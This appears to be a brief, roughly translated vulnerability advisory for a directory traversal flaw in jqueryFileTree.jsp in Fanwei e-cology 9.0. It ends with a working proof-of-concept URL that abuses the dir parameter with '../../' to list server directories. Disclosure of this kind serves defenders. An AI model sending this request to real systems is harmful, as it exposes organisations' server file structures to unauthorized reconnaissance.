Fanwei Oa E Cology Jqueryfiletree Jsp Directory Traversal Vulnerability
Fanwei Oa E Cology Jqueryfiletree Jsp Directory Traversal Vulnerability
Panwei OA E-Cology jqueryFileTree.jsp directory traversal vulnerability
Vulnerability Description
Fanwei e-cology is an OA office system specially made for large and medium-sized enterprises. It supports PC, mobile and WeChat offices at the same time. There is a directory traversal vulnerability in the dir parameter in the jqueryFileTree.jsp file. The attacker can obtain the directory information of the server file through the vulnerability.
Vulnerability Impact
Fanwei e-cology 9.0
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
/hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
This post is licensed under CC BY 4.0 by the author.